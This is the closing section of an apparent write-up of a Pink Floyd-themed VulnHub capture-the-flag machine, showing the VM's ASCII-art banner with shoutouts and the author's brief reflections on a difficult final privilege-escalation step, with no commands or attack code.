  | |       |       |   \    |     /        |       |       |       | |
  |_|_______|_______|___ \ __|___ /,  _ |   | ______|_______|_______|_|
  |     |       |       | \      // \   |   |   |       |       |     |
  |_____|_______|_______|_ \ /\ //--'\  |   | __|_______|_______|_____|
  | |       |       |       '  V/    |  |-' |__,    |       |       | |
  |_|_______|_______|_______|_______ _______'_______|_______|_______|_|
  |     |       |       |       |       |       |       |       |     |
  |_____|_______|_______|_______|_______|_______|_______|_______|_____|
  |_________|_______|_______|_______|_______|_______|_______|_______|_|

                  Celebrating 50 years of Pink Floyd!
             Syd Barrett (RIP), Nick Mason, Roger Waters,
               Richard Wright (RIP), and David Gilmour.


** Shoutouts **
+ @vulnhub for making it all possible
+ @rastamouse @thecolonial - "the test bunnies"

-=========================================-
-  xerubus (@xerubus - www.mogozobo.com)  -
-=========================================-

Conclusion

I really enjoyed this VM - not just because I'm a big fan of Pink Floyd, but also because of how it was laid out. The final step really did my head in. I spent days obsessing over how I could elevate my privileges, without read access to the final binary.

One lesson I'm taking away from this is: always double-check your evidence. You never know when the last piece of the puzzle is sitting there in plain sight.

Thanks for the challenge, Xerubus, and thank you for hosting it, VulnHub!